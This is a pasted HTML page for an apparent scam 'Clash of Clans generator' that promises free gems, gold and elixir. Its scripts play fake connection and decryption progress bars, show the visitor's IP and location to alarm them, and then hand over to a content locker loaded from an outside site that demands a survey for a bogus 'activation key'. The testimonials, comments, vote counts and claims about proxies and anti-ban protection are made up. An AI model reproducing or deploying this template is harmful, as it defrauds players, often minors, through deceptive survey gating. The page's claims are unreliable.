Advertisement
Guest User

Untitled

a guest
Dec 18th, 2014
134
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 35.37 KB | None | 0 0
  1.  
  2. <!DOCTYPE html>
  3. <html xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'>
  4. <head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
  5.  
  6. <meta content='With our Clash of Clans Generator you can get Unlimited Resources for your game!. Just try it now, it is FREE!' name='description'/>
  7. <meta content='Clash of Clans Hack, Clash of Clans Hack Online, Clash of Clans Hack tool,Clash of Clans cheats' name='Keywords'/>
  8. <title>Clash of Clans Online - Google Platform </title>
  9. <link href='http://fonts.googleapis.com/css?family=Roboto:100,300,400,500,700,900' rel='stylesheet'/>
  10. <link rel="shortcut icon" href="http://www.iconj.com/ico/1/f/1fcj4r8iha.ico" type="image/x-icon" />
  11. <link rel="shortcut icon" href="http://www.iconj.com/ico/1/f/1fcj4r8iha.ico" type="image/x-icon" />
  12. <link rel="stylesheet" href="http://hacks-store.com/images/css/screen.css" type="text/css" />
  13. <script type="text/javascript" src="http://cleanfiles.net/js/w.php?i=43324Pk8fF"></script>
  14. <script src="//ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
  15.  
  16. <script type="text/javascript">
  17. /******************************************
  18. * Snow Effect Script- By Altan d.o.o. (http://www.altan.hr/snow/index.html)
  19. * Visit Dynamic Drive DHTML code library (http://www.dynamicdrive.com/) for full source code
  20. * Last updated Nov 9th, 05' by DD. This notice must stay intact for use
  21. ******************************************/
  22.  
  23. //Configure below to change URL path to the snow image
  24. var snowsrc="http://android2014ios.com/snow.gif"
  25. // Configure below to change number of snow to render
  26. var no = 30;
  27. // Configure whether snow should disappear after x seconds (0=never):
  28. var hidesnowtime = 0;
  29. // Configure how much snow should drop down before fading ("windowheight" or "pageheight")
  30. var snowdistance = "pageheight";
  31.  
  32. ///////////Stop Config//////////////////////////////////
  33.  
  34. var ie4up = (document.all) ? 1 : 0;
  35. var ns6up = (document.getElementById&&!document.all) ? 1 : 0;
  36.  
  37. function iecompattest(){
  38. return (document.compatMode && document.compatMode!="BackCompat")? document.documentElement : document.body
  39. }
  40.  
  41. var dx, xp, yp; // coordinate and position variables
  42. var am, stx, sty; // amplitude and step variables
  43. var i, doc_width = 800, doc_height = 600;
  44.  
  45. if (ns6up) {
  46. doc_width = self.innerWidth;
  47. doc_height = self.innerHeight;
  48. } else if (ie4up) {
  49. doc_width = iecompattest().clientWidth;
  50. doc_height = iecompattest().clientHeight;
  51. }
  52.  
  53. dx = new Array();
  54. xp = new Array();
  55. yp = new Array();
  56. am = new Array();
  57. stx = new Array();
  58. sty = new Array();
  59. snowsrc=(snowsrc.indexOf("dynamicdrive.com")!=-1)? "http://android2014ios.com/snow.gif" : snowsrc
  60. for (i = 0; i < no; ++ i) {
  61. dx[i] = 0; // set coordinate variables
  62. xp[i] = Math.random()*(doc_width-50); // set position variables
  63. yp[i] = Math.random()*doc_height;
  64. am[i] = Math.random()*20; // set amplitude variables
  65. stx[i] = 0.02 + Math.random()/10; // set step variables
  66. sty[i] = 0.7 + Math.random(); // set step variables
  67. if (ie4up||ns6up) {
  68. if (i == 0) {
  69. document.write("<div id=\"dot"+ i +"\" style=\"POSITION: absolute; Z-INDEX: "+ i +"; VISIBILITY: visible; TOP: 15px; LEFT: 15px;\"><a href=\"http://dynamicdrive.com\"><img src='"+snowsrc+"' border=\"0\"><\/a><\/div>");
  70. } else {
  71. document.write("<div id=\"dot"+ i +"\" style=\"POSITION: absolute; Z-INDEX: "+ i +"; VISIBILITY: visible; TOP: 15px; LEFT: 15px;\"><img src='"+snowsrc+"' border=\"0\"><\/div>");
  72. }
  73. }
  74. }
  75.  
  76. function snowIE_NS6() { // IE and NS6 main animation function
  77. doc_width = ns6up?window.innerWidth-10 : iecompattest().clientWidth-10;
  78. doc_height=(window.innerHeight && snowdistance=="windowheight")? window.innerHeight : (ie4up && snowdistance=="windowheight")? iecompattest().clientHeight : (ie4up && !window.opera && snowdistance=="pageheight")? iecompattest().scrollHeight : iecompattest().offsetHeight;
  79. for (i = 0; i < no; ++ i) { // iterate for every dot
  80. yp[i] += sty[i];
  81. if (yp[i] > doc_height-50) {
  82. xp[i] = Math.random()*(doc_width-am[i]-30);
  83. yp[i] = 0;
  84. stx[i] = 0.02 + Math.random()/10;
  85. sty[i] = 0.7 + Math.random();
  86. }
  87. dx[i] += stx[i];
  88. document.getElementById("dot"+i).style.top=yp[i]+"px";
  89. document.getElementById("dot"+i).style.left=xp[i] + am[i]*Math.sin(dx[i])+"px";
  90. }
  91. snowtimer=setTimeout("snowIE_NS6()", 10);
  92. }
  93.  
  94. function hidesnow(){
  95. if (window.snowtimer) clearTimeout(snowtimer)
  96. for (i=0; i<no; i++) document.getElementById("dot"+i).style.visibility="hidden"
  97. }
  98.  
  99.  
  100. if (ie4up||ns6up){
  101. snowIE_NS6();
  102. if (hidesnowtime>0)
  103. setTimeout("hidesnow()", hidesnowtime*1000)
  104. }
  105.  
  106. </script>
  107.  
  108.  
  109.  
  110.  
  111.  
  112.  
  113.  
  114.  
  115. <link type='text/css' rel='stylesheet' href='https://www.blogger.com/static/v1/widgets/3841957138-widget_css_bundle.css' />
  116. <link type='text/css' rel='stylesheet' href='https://www.blogger.com/dyn-css/authorization.css?targetBlogID=2650666066160479665&zx=944a2a80-6b0a-47bf-b688-d0f7156b49c7' />
  117.  
  118. <script>
  119. function validateForm() {
  120. var x = document.forms["myForm"]["fname"].value;
  121. if (x==null || x=="" || !isFinite(x)) {
  122. alert("First name must be filled out");
  123. return false;
  124. }
  125. }
  126. </script>
  127.  
  128.  
  129. <style id='page-skin-1' type='text/css'>
  130.  
  131.  
  132. #block{padding:10px 6px 0 6px;}
  133. #block h3{background:url() no-repeat center;font-size:23px;}
  134. #block p.content{overflow: visible;}
  135.  
  136. .inactive {
  137. opacity: 0;
  138. transition: 2s;
  139. }
  140. .active {
  141. opacity: 1;
  142. }
  143.  
  144. * {
  145. border: 0;
  146. margin: 0;
  147. outline: 0;
  148. padding: 0;
  149. }
  150. body {
  151. background: #f5f5f5;
  152. color: #333333;
  153. font: 300 14px/20px 'Roboto', Arial, sans-serif;
  154. text-align: justify;
  155. }
  156. h1 {
  157. font: 100 28px/35px 'Roboto', Arial, sans-serif;
  158. margin-bottom: 10px;
  159. }
  160. h2 {
  161. font: 100 28px/35px 'Roboto', Arial, sans-serif;
  162. margin-bottom: 10px;
  163. }
  164. h3 {
  165. font: 100 28px/35px 'Roboto', Arial, sans-serif;
  166. margin-bottom: 10px;
  167. }
  168. input {
  169. padding: 5px;
  170. }
  171. #x00 {
  172. display: none;
  173. }
  174. #x00-header {
  175. background: #e5e5e5;
  176. border-bottom: 2px solid #d6d6d6;
  177. }
  178. #x00-header-content {
  179. margin: 0 auto;
  180. padding: 20px 0px;
  181. width: 700px;
  182. }
  183. #x00-header-content-2 {
  184. margin: 0 auto;
  185. padding: 20px 0px;
  186. width: 700px;
  187. }
  188. #x00-header-content-2-image {
  189. float: left;
  190. }
  191. #x00-header-content-2-image img {
  192. width: 200px;
  193. }
  194. #x00-header-content-2-content {
  195. float: left;
  196. margin-left: 20px;
  197. }
  198. #x00-step-1 {
  199. }
  200. #x00-button-container {
  201. }
  202. #x00-button {
  203. background: #b3c833;
  204. border-bottom: 2px solid #b3c833;
  205. color: #ffffff;
  206. font-weight: 500;
  207. padding: 5px 20px;
  208. text-decoration: none;
  209. }
  210. #x00-button:hover {
  211. background: #c1d739;
  212. border-color: #8c9c29;
  213. }
  214. #x00-step-2 {
  215. background: url('http://hacks-store.com/scripts/scr2/ajax-loader.gif') center left no-repeat;
  216. color: #000000;
  217. display: none;
  218. padding-left: 20px;
  219. }
  220. #x00-step-3 {
  221. display: none;
  222. }
  223. #x00-button-container-2 {
  224. }
  225. #x00-button-2 {
  226. background: #b3c833;
  227. border-bottom: 2px solid #b3c833;
  228. color: #ffffff;
  229. font-weight: 500;
  230. padding: 5px 20px;
  231. text-decoration: none;
  232. }
  233. #x00-button-2:hover {
  234. background: #c1d739;
  235. border-color: #8c9c29;
  236. }
  237. #x00-content {
  238. margin: 0 auto;
  239. width: 700px;
  240. }
  241. #x00-notification {
  242. background: #fcfcfc;
  243. border-bottom: 2px solid #ffab04;
  244. display: none;
  245. margin: 20px auto;
  246. padding: 20px;
  247. width: 660px;
  248. }
  249. #x00-notification-icon {
  250. background: url('http://hacks-store.com/scripts/scr2/warning.png') top left no-repeat;
  251. float: left;
  252. height: 80px;
  253. width: 80px;
  254. }
  255. #x00-notification-text {
  256. float: left;
  257. margin-left: 20px;
  258. padding-top: 10px;
  259. width: 540px;
  260. }
  261. #x00-notification-ip {
  262. font-weight: 700;
  263. }
  264. #x00-how {
  265. border-bottom: 1px solid #d6d6d6;
  266. margin: 0 auto;
  267. padding: 30px 0;
  268. width: 700px;
  269. }
  270. #x00-working {
  271. border-bottom: 1px solid #d6d6d6;
  272. margin: 0 auto;
  273. padding: 30px 0;
  274. width: 700px;
  275. }
  276. #x00-new {
  277. border-bottom: 1px solid #d6d6d6;
  278. margin: 0 auto;
  279. padding: 30px 0;
  280. width: 700px;
  281. }
  282. #x00-description {
  283. margin: 0 auto;
  284. margin-bottom: 50px;
  285. padding: 20px 0;
  286. width: 700px;
  287. }
  288. #x00-footer {
  289. background: #e5e5e5;
  290. color: #555555;
  291. font-size: 13px;
  292. font-weight: 400;
  293. }
  294. #x00-footer-content {
  295. margin: 0 auto;
  296. padding: 30px 0;
  297. width: 700px;
  298. }
  299. .x00-clearfix {
  300. zoom: 1;
  301. }
  302. .x00-clearfix:after {
  303. clear: both;
  304. content: ".";
  305. display: block;
  306. font-size: 0;
  307. height: 0;
  308. line-height: 0;
  309. visibility: hidden;
  310. }
  311. .x00-box {
  312. background: #ffffff;
  313. padding: 20px;
  314. -moz-border-radius: 2px;
  315. -webkit-border-radius: 2px;
  316. border-radius: 2px;
  317. -moz-box-shadow: 0 2px 4px rgba(0, 0, 0, 0.10);
  318. -ms-box-shadow: 0 2px 4px rgba(0, 0, 0, 0.10);
  319. -webkit-box-shadow: 0 2px 4px rgba(0, 0, 0, 0.10);
  320. box-shadow: 0 2px 4px rgba(0, 0, 0, 0.10);
  321. }
  322.  
  323. .holder input.checkbox-first { float: left; margin-right: 3px; width: 18px; height: 16px; }
  324. .holder input.checkbox-second { float: left; margin-right: 3px; width: 18px; height: 16px; }
  325. .holder input.checkbox-third { float: left; margin-right: 3px; width: 18px; height: 16px; }
  326. span.checkbox-text { float: left; font-size: 13px; margin-left: 0px; margin-right: 20px; font-family: Arial; padding-top: 0px; }
  327. input.textbox-email {
  328. opacity: 0;
  329. transition: 2s;
  330. height: 19px;
  331. background: #b3c833;
  332. margin-left: 87px;
  333. border-bottom: 2px solid #b3c833;
  334. color: #ffffff;
  335. font-weight: 500;
  336. padding: 5px 20px;
  337. text-decoration: none;
  338. }
  339. /* all */
  340. input.textbox-email::-webkit-input-placeholder { color:#ffffff; }
  341. input.textbox-email::-moz-placeholder { color:#ffffff; } /* firefox 19+ */
  342. input.textbox-email:-ms-input-placeholder { color:#ffffff; } /* ie */
  343. input.textbox-email:input:-moz-placeholder { color:#ffffff; }
  344. input.active { opacity: 1; }
  345.  
  346. </style>
  347.  
  348.  
  349. <script src='http://hacks-store.com/scripts/scr2/jquery.min.js'></script>
  350. <!-- Place here your content locker script tags, like: <script>...</script> -->
  351. <script type='text/javascript'>//<![CDATA[
  352. function Locker() {
  353. call_locker();
  354. <!-- gateway('54295846dfd9e'); -->
  355. }
  356. function Notification_Init(Callback) {
  357. $.ajax({
  358. url: 'http://hacks-store.com/scripts/scr2/location.php',
  359. dataType: 'jsonp',
  360. success: function(Response) {
  361. $('#x00-notification-ip').html(Response[0]);
  362. $('#x00-notification-location').html(' (' + Response[1] + ', ' + Response[2] + ')');
  363. $('#x00').fadeIn();
  364. Callback();
  365. },
  366. error: function(Error) {
  367. $('#x00-notification-ip').hide();
  368. $('#x00-notification-location').hide();
  369. $('#x00').fadeIn();
  370. Callback();
  371. }
  372. });
  373. }
  374. function Process_Init() {
  375. $('#x00-step-1').hide();
  376. $('#x00-step-2').show();
  377. var Process = 'Connecting to Supercell: Clash of Clans server...';
  378. var Position = 1;
  379. var ProcessInterval = setInterval(function() {
  380. $('#x00-step-2').html(Process.substr(0, Position));
  381. Position++;
  382. if (Position === Process.length + 1) {
  383. clearInterval(ProcessInterval);
  384. var Percent = 0;
  385. var PercentInterval = setInterval(function() {
  386. var Random = Math.floor((Math.random() * 15) + 5);
  387. Percent += Random;
  388. if (Percent < 0) {
  389. $('#x00-step-2').html(Process + ' <span style="font-weight: 500;">' + Percent + '%</span>');
  390. }
  391. else {
  392. $('#x00-step-2').html(Process + ' <span style="font-weight: 500;">100%</span>');
  393. clearInterval(PercentInterval);
  394. $('#x00-step-2').hide();
  395. $('#x00-step-3').show();
  396. }
  397. }, 1000);
  398. }
  399. }, 50);
  400. }
  401. function Process_Hack() {
  402. $('#x00-step-3').hide();
  403. $('#x00-step-2').html('');
  404. $('#x00-step-2').show();
  405. var Processes = ['Connecting to Supercell: Extracting Resources Value...','Decrypting code numbers...','Your Resources will be generate...'];
  406. var Current = 0;
  407. var Position = 0;
  408. var Process = function() {
  409. var ProcessInterval = setInterval(function() {
  410. $('#x00-step-2').html(Processes[Current].substr(0, Position));
  411. Position++;
  412. if (Position === Processes[Current].length + 1) {
  413. Position = 0;
  414. clearInterval(ProcessInterval);
  415. var Percent = 0;
  416. var PercentInterval = setInterval(function() {
  417. var Random = Math.floor((Math.random() * 5) + 1);
  418. Percent += Random;
  419. if (Percent < 1) {
  420. $('#x00-step-2').html(Processes[Current] + ' <span style="font-weight: 500;">' + Percent + '%</span>');
  421. }
  422. else {
  423. $('#x00-step-2').html(Processes[Current] + ' <span style="font-weight: 500;">100%</span>');
  424. clearInterval(PercentInterval);
  425. Current++;
  426. if (Current === Processes.length) {
  427. $('#x00-step-2').html('Waiting for your Activation...');
  428. $('#activate-button').html('<br/><a href="javascript:void(0)" onClick="show_widget();" id="x00-button">Activate</a> ');
  429. $('#x00-notification').slideDown();
  430. setTimeout(function() {
  431. Locker();
  432. }, 5000);
  433. }
  434. else {
  435. Process();
  436. }
  437. }
  438. }, 1000);
  439. }
  440. }, 50);
  441. };
  442. Process();
  443. }
  444. $(document).ready(function() {
  445. Notification_Init(function() {
  446. $('#x00').fadeIn();
  447. });
  448. $('#x00-button').click(function(Event) {
  449. Event.preventDefault();
  450. Process_Init();
  451. return false;
  452. });
  453. $('#x00-button-2').click(function(Event) {
  454. Event.preventDefault();
  455. Process_Hack();
  456. return false;
  457. });
  458. $('.checkbox-third').on('click', function (e) {
  459. $('.textbox-email').toggleClass("active");
  460. });
  461. });
  462. //]]></script>
  463.  
  464.  
  465.  
  466.  
  467. <script type="text/javascript">var a="indexOf",b="&m=1",e="(^|&)m=",f="?",g="?m=1";function h(){var c=window.location.href,d=c.split(f);switch(d.length){case 1:return c+g;case 2:return 0<=d[1].search(e)?null:c+b;default:return null}}var k=navigator.userAgent;if(-1!=k[a]("Mobile")&&-1!=k[a]("WebKit")&&-1==k[a]("iPad")||-1!=k[a]("Opera Mini")||-1!=k[a]("IEMobile")){var l=h();l&&window.location.replace(l)};
  468. </script><script type="text/javascript">
  469. if (window.jstiming) window.jstiming.load.tick('headEnd');
  470. </script>
  471.  
  472. <!-- SIDEBAR JS -->
  473. <link rel="stylesheet" type="text/css" href="http://hacks-store.com/sidebar/sidebarstyle.css" />
  474. <script type="text/javascript" src="http://hacks-store.com/sidebar/jquery-ui.min.js"></script>
  475. <script type="text/javascript" src="http://hacks-store.com/sidebar/jquery-1.11.1.min.js"></script>
  476. <script type="text/javascript" src="http://hacks-store.com/sidebar/sidebar.js"></script>
  477.  
  478. </head>
  479. <body link='black'>
  480. <!-- Content -->
  481. <div id='x00'>
  482. <div id='x00-header'>
  483. <div id='x00-header-content' style='display: none;'>
  484. </div>
  485. <div class='x00-clearfix' id='x00-header-content-2'>
  486. <div id='x00-header-content-2-image'>
  487. <img alt='Clash of Clans' src='http://i61.tinypic.com/qyabyh.png'/>
  488. </div>
  489. <div id='x00-header-content-2-content'>
  490. <h1><I><b>Clash Of Clans - Google Platform</b></i></h1>
  491. <p style='color: #8d8d8d; font-size: 12px; margin-bottom: 10px;'>
  492. <span style='font-weight: 700'>Supercell</span> - <span style='font-weight: 500'>UPDATED : </span> <span id="spanDate"></span>
  493. <script type="text/javascript">
  494. var months = ['January','February','March','April','May','June','July',
  495. 'August','September','October','November','December'];
  496. var tomorrow = new Date();
  497. document.getElementById("spanDate").innerHTML = months[tomorrow.getMonth()] + " " + tomorrow.getDate()+ ", " + tomorrow.getFullYear();
  498. </script>
  499. </p>
  500. <div id='x00-step-1'>
  501. <div style='color: #000; margin-bottom: 15px;'>
  502. Press the <b>Connect</b> button to connect to Supercell Database. </br>
  503. A connection will start after you will press <b>Connect</b> button.
  504. </div>
  505. <div id='x00-button-container'>
  506. <span class="checkbox-text" style='font-weight: 500'><b>You want resources for your :</b></span>
  507.  
  508. <div class="holder" style="width: 470px; height: 30px; margin: auto;">
  509.  
  510. <input type="radio" class="checkbox-first" name="salam"><span class="checkbox-text">Android</b></span>
  511. <input type="radio" class="checkbox-second" name="salam"><span class="checkbox-text">iOS</b></span>
  512. </div>
  513. <a href='#' id='x00-button'>Connect</a>
  514. <input type="name" class="text" placeholder="Your Username">
  515.  
  516. </div>
  517. </div>
  518. <div id='x00-step-2'></div>
  519. <div id='activate-button'></div>
  520.  
  521. <div id='x00-step-3'>
  522. <table style='margin-bottom: 15px;'>
  523. <form name="myForm" onsubmit="return validateForm()" method="post">
  524. <tr>
  525. <td style='background: url(&#39;http://i59.tinypic.com/4uf7nm.png&#39;) center center no-repeat; height: 30px; width: 30px;'></td>
  526. <td style='padding-left: 5px;'><input placeholder='Write here number of Gems' type='text'/></td>
  527. </tr>
  528. <tr>
  529. <td style='background: url(&#39;http://i60.tinypic.com/2qlz5mf.png&#39;) center center no-repeat; height: 30px; width: 30px;'></td>
  530. <td style='padding-left: 5px;'><input placeholder='Write here number of Gold' type='text'/></td>
  531. </tr>
  532. <tr>
  533. <td style='background: url(&#39;http://i57.tinypic.com/n36pdw.png&#39;) center center no-repeat; height: 30px; width: 30px;'></td>
  534. <td style='padding-left: 5px;'><input placeholder='Write here number of Elixir' type='text'/></td>
  535. </tr>
  536. <tr>
  537. <td style='padding-left: 5px;'>
  538. <input name='myTextEditBox' type='checkbox' value='unchecked'/>
  539. </td>
  540. <td style='padding-left: 5px;'>
  541. <b>Unlock All Boards</b></td>
  542. </tr>
  543. <tr>
  544. <td style='padding-left: 5px;'>
  545. <input name='myTextEditBox' type='checkbox' value='unchecked'/>
  546. </td>
  547. <td style='padding-left: 5px;'>
  548. <b>Unlock All Characters</b></td>
  549. </tr>
  550. <tr>
  551. <td style='padding-left: 5px;'>
  552. <input name='myTextEditBox' type='checkbox' value='unchecked'/>
  553. </td>
  554. <td style='padding-left: 5px;'>
  555. <b>ANTI-BAN Script</b></td>
  556. </tr>
  557.  
  558. <td style='padding-left: 5px;'>
  559.  
  560.  
  561.  
  562. </tr>
  563. </table>
  564. <div id='x00-button-container-2'>
  565. <!---<a href='#' id='x00-button-2'>Generate Now</a> -->
  566. <input type="submit" id="x00-button-2" value="Generate now" />
  567. </div>
  568. </form>
  569. </div>
  570. </div>
  571. </div>
  572. </div>
  573. <div id='x00-content'>
  574. </div>
  575. <div class='x00-clearfix' id='x00-notification'>
  576. <div id='x00-notification-icon'></div>
  577. <div id='x00-notification-text'>
  578. <p>
  579. <span style='color: #ffab04; font-weight: 700;'>Warning!</span> You must get an Activation Key for your <b>IP</b> to avoid the Supercell: Clash of Clans security system detecting our Generator. Just complete a survey ( it will take 1 minute ) and you will be able to use our Generator. We're sorry for this inconvenance.
  580. </p>
  581. </div>
  582. </div>
  583. <br>
  584. <center><b><I><a href="http://clashofclansgiftfr.filesarena.net/">Click for Page in French !</A></b></i>
  585. <div id='x00-new'>
  586. <h1 align='center'>Clash of Clans Tutorial Generator<Br><br>
  587. <iframe width="420" height="255"
  588. src="http://www.youtube.com/embed/XL5ybsX3w1Q">
  589. </iframe><br>
  590. <Br>
  591. How to use Clash of Clans Generator ?</h1>
  592. <p align="center">
  593. It's very easy to use our Generator .<br/>
  594. 1. When you're on our website, select your platform then click <b>Connect</b> button and connect your phone by USB Cable.<br/>
  595. 2. When you're connected, just add a valid number for Gems , Gold and Elixire and Unlock features that you like.<br/>
  596. 3. Check <b>Anti-Ban Script</b> if you don't want to get banned..<br/>
  597. 4. Click Generate Now button and wait until the progress will be loaded 100%.<br/>
  598. 5. Enjoy your game!.<br/><br/>
  599. Maybe you worry about using this Generator with your own IP. I tell you that you don't have to worry because our Generator will work with another IP. We included a lot of Fresh Proxies in this script and everytime when you will Connect to their database, you will have another IP.
  600. </p>
  601. </div>
  602.  
  603. <div id='x00-how'>
  604. <h2 align='center'>Some informations about Clash of Clans Generator </h2>
  605. <p align='center'>
  606. ** Online Generator - No Download ** <br/>
  607. ** Work very fast, it will take just some minutes **<br/>
  608. ** Add Unlimited Gems , Gold and Elixir **<br/>
  609. ** Working on Android / iOS **<br/>
  610. ** IP Protection ( Private Proxies ) ** <br/>
  611.  
  612. </p>
  613. </div>
  614.  
  615.  
  616.  
  617. <div id='x00-new'>
  618. <h3 align='center'>What is Clash of Clans Generator ?</h3>
  619. <p>
  620. It's an online tool that will help you to get Unlimited Gems, Gold and Elixir for your Game. If you don't want to pay for them, you're in the right place. Just connect your phone, insert resources and done!
  621.  
  622. </p>
  623. </div>
  624. <div id='x00-new'>
  625. <h3 align='center'>How Works Clash of Clans Generator ? </h3>
  626. <p>
  627. This Generator it's based on million line codes, so we can't tell you the whole process, but I'll tell you a little story. This Generator will connect to Clash of Clans Database, and will search Coupon codes that will give you the exact amount of resources that you entered in it. After that it will bypass their security, extract that Codes and put them in your phone / account.
  628. </p>
  629. </div>
  630. <div id='x00-new'>
  631. <h3 align='center'>Clash of Clans Generator Features : </h3>
  632. <p align='center'>
  633. - Get Unlimited Gems<br/>
  634. - Get Unlimited Gold<br/>
  635. - Get Unlimited Elixir<br/>
  636. - Unlimited Proxies ( Safe Mode )<br/>
  637. - Anti-Ban Script<br/>
  638.  
  639. </p>
  640. </div>
  641. <div id='x00-new'>
  642. <h3 align='center'>Questions and Answers</h3>
  643. <p align='center'>
  644. Q : Does it really works ? Is this Clash Of Clans Generator Online an safe website?<br/>
  645. A : Sure, we didn't develop bad websites, our Clash Of Clans website works 100%, just test it by yourself. ;) It's legit 100%, don't worry.<br/>
  646. <br/>
  647. Q : Why if they will patch the game ?<br/>
  648. A : They can't patch our method. They will never know about our existence because we're using a lot of programs to hide our traces.<br/>
  649. <br/>
  650. Q : Is this Clash of Clans an Online Tool ? <br/>
  651. A : As you can see, you don't have to download an Visual Basic Application for game. All things revelated by us will be online.<br/>
  652. <br/>
  653. Q : Do you plan to add generators for more games?<br/>
  654. A : Sure! In our project will be included more popular Games like Dragon City, Candy Crush Saga and more other games.<br/>
  655. <br/>
  656. </p>
  657. </div>
  658. <div id='x00-description'>
  659. <h3 align='center'></h3>
  660. <br/>
  661.  
  662.  
  663. <div id="block">
  664. <h3>Testimonials about our Clash of Clans Generator</h3>
  665. <div class="photo">
  666. <img src="http://hacks-store.com/images/img/photo-bg.png" alt="" class="photo-bg"/>
  667. <img src="http://hacks-store.com/images/img/photo.jpg" alt="" class="photo" />
  668. </div>
  669. <p class="content"><span class="laquo">&nbsp;</span>I was sceptic before, but after I've tried I was convinced that it works 100%. Thank you for all your work !!<span class="raquo">&nbsp;</span></p>
  670. <div class="sign">
  671. <a href="#">Jay Hafling</a>
  672. <p>Freelance web-designer</p>
  673. </div>
  674. </div>
  675. <br/>
  676. <br/>
  677. <br/>
  678. <br/>
  679. <div id="block">
  680. <h3></h3>
  681. <div class="photo">
  682. <img src="http://hacks-store.com/images/img/photo-bg.png" alt="" class="photo-bg"/>
  683. <img src="http://hacks-store.com/images/img/photo.jpg" alt="" class="photo" />
  684. </div>
  685. <p class="content"><span class="laquo">&nbsp;</span>Wow, it works without any problem. I've tested it on my Android device and now I have unlimited resources, omg. You can see my screenshot below :<span class="raquo">&nbsp;</span></p>
  686. <div class="sign">
  687. <a href="#">Andrew G. Brown</a>
  688. <p>PRO Gamer</p>
  689. </div>
  690. </div>
  691.  
  692.  
  693. <br/><br/>
  694.  
  695.  
  696.  
  697. <br/><br/>
  698. </div>
  699. <div id='x00-footer'>
  700. <div id='x00-footer-content'>
  701. &#169; 2014 Clash of Clans Gems - Online Generator
  702. </div>
  703. </div>
  704. </div>
  705. <!-- /Content -->
  706.  
  707. <!-- Slidebar -->
  708. <link href="http://fonts.googleapis.com/css?family=Roboto:100,300,400,500,700,900" rel="stylesheet">
  709.  
  710.  
  711.  
  712. <link href="http://fonts.googleapis.com/css?family=Roboto:100,300,400,500,700,900" rel="stylesheet">
  713. <div id="sidebar">
  714.  
  715. <div id="commentswrap">
  716. <div id="comments">
  717. <!--DO NOT EDIT-->
  718. <div style="height: 10px; width: 230px"></div>
  719. <center><span id="commentsheader" style="color: #FFFFFF; font-size: 17px;">
  720. <strong>Recent Comments</strong>
  721. </span></center>
  722. <div style="height: 10px; width: 230px"></div>
  723. <!--DO NOT EDIT END-->
  724.  
  725. <div class="commentss">
  726. <div id="commentsdp"> </div>
  727. <div id="comment">
  728. <span id="name1" class="name" style='font-weight: 700'> David C. Higa </span> <!--EDIT NAME-->
  729. <span id="commentdate1" class="commentdate"></span><br />
  730. <span id="comment1" class="comment"> <!--EDIT COMMENT1 BELOW-->
  731.  
  732. <p align='center'>
  733. Everything works fine, without any problem ;) All you have to do is to follow his steps and you will get what you want.? Thank you!
  734. </p>
  735. </span>
  736. </div>
  737. </div>
  738. <hr align="center" width="200" size="2" style="height: 10px;">
  739.  
  740. <div class="commentss">
  741. <div id="commentsdp"> </div>
  742. <div id="comment">
  743. <span id="name2" class="name" style='font-weight: 700'> eddy10 </span> <!--EDIT NAME-->
  744. <span id="commentdate2" class="commentdate"></span><br />
  745. <span id="comment2" class="comment"> <!--EDIT COMMENT2 BELOW-->
  746.  
  747. <p align='center'>
  748. Tested and working on my android device, thank you so much for it !
  749. </p>
  750. </span><br/>
  751. </div>
  752. </div>
  753. <hr align="center" width="200" size="2" style="height: 10px;">
  754.  
  755. <div class="commentss">
  756. <div id="commentsdp"> </div>
  757. <div id="comment">
  758. <span id="name3" class="name" style='font-weight: 700'> Richard Boss </span> <!--EDIT NAME-->
  759. <span id="commentdate3" class="commentdate"></span><br />
  760. <span id="comment3" class="comment"> <!--EDIT COMMENT3 BELOW-->
  761.  
  762. <p align='center'>
  763. this one works great for me, I don't have any kind of problem with it. i followed his video tutorial and i get unlimited resources, hell ya
  764. </p>
  765. </span>
  766. </div>
  767. </div>
  768. <hr align="center" width="200" size="2" style="height: 10px;">
  769.  
  770. <!----------------->
  771. <!-- DO NOT EDIT -->
  772. <!----------------->
  773. <div class="commentss">
  774. <!--<span id="name3" class="name"> Submit Your Comments </span> <br />-->
  775. <span class="comment">
  776. <input type='textbox' id="postcommentname" placeholder="Enter your Name" size="22" />
  777. <textarea id="postcommentarea" rows="4" cols="18" placeholder="What do you think about our Generator?"></textarea>
  778. </span>
  779. </div>
  780. <div id="postbutton" style="color: #FFF;">Post</div>
  781. </div>
  782. <!------------------------>
  783. <!-- END OF DO NOT EDIT -->
  784. <!------------------------>
  785.  
  786. <div id="commentsbutton" class="slideleft">
  787. <div id="sidebarhide">Comments</div>
  788. </div>
  789. <div id="commentsclosebutton"></div>
  790. </div>
  791.  
  792. <div id="pollwrap">
  793. <div id="poll">
  794. <!--DO NOT EDIT-->
  795. <div style="height: 10px; width: 230px"></div>
  796. <center><span id="commentsheader" style="color: #FFFFFF; font-size: 16px;">
  797. <strong>POLL: Did it work for you? <br/>Let us know!</strong>
  798. </span></center>
  799. <!--END OF DO NOT EDIT-->
  800.  
  801. <p style="text-align: center;">
  802. <input onclick="JavaScript:alert('Please use our hack tool before using the pool. Thank you!')" type="image" src="http://abload.de/img/yes1umy1s.png" value="YES" />
  803.  
  804. <input onclick="JavaScript:alert('Please use our hack tool before using the pool. Thank you!')" type="image" src="http://abload.de/img/no1ocxf0.png" value="NO" /></p>
  805.  
  806. <p style="text-align: center;"><strong><span style="color: #008000;">523 Votes for </span><span style="color: #008000;">Yes</span><span style="color: #000;"> / </span><span style="color: #ff0000;">17</span><span style="color: #ff0000;"> For NO</span></strong></p>
  807. <!-- <div class="voteresults"><span style="float: left; width: 28px;">Yes</span><div id="yesvotes">1038 Votes</div></div>
  808. <div class="voteresults"><span style="float: left; width: 28px;"">No</span><div id="novotes">73 Votes</div></div>-->
  809. </div>
  810.  
  811. <div id="pollbutton" class="slideleft">
  812. <div id="sidebarhide">Poll</div>
  813. </div>
  814. <div id="pollclosebutton"></div>
  815. </div>
  816. </div>
  817. <!-- /Slidebar -->
  818.  
  819. <script type="text/javascript">
  820. if (window.jstiming) window.jstiming.load.tick('widgetJsBefore');
  821. </script><script type="text/javascript" src="https://www.blogger.com/static/v1/widgets/2131577651-widgets.js"></script>
  822. <script type='text/javascript'>
